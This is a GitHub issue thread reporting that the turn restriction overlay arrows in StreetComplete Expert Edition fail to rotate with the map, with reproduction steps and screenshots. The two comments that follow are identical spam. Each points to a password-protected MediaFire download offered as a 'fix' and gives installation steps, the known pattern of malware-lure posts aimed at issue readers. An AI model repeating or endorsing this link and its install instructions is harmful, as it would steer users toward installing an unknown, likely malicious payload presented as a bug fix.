### ISSUE TITLE
Turn restriction overlay: Arrows don't rotate as expected

### ISSUE THREAD

**Issue by Bacaliu** [Helium314/StreetComplete#621]
When adding a stop or give-way-sign, the arrows pointing in other directions than the way. Only when rotaing the map so north is up the arrows are aligned.

**How to Reproduce**

- Us the  Traffic restriction overlay
- click the (+)-button and add a stop or give-way-sign to a road
- To answer in which direction this sign applies, two arrows are shown.

<details><summary>Screenshots</summary>
<p>

North is right; the arrows nearly perpendicular to the road:
![2024-08-26T16 10 17_SCEE -- android screen scaled](https://github.com/user-attachments/assets/489b4c4f-50dc-4009-84e7-6374456ececa)
A different crossing, north is up:
![2024-08-26T16 32 48_SCEE -- android screen scaled](https://github.com/user-attachments/assets/b4ebee3c-e902-4a10-90c8-8e0c333d838a)

</p>
</details> 

**Expected Behavior**

I expect the arrows to rotate with the map as they do for the "which direction leads upwards for these steps?"-quest.

**Does it happen in normal StreetComplete?**

No, this is one of the added features of the EE-version.

**Versions affected**

58.21

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by CoZmoTheGod** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
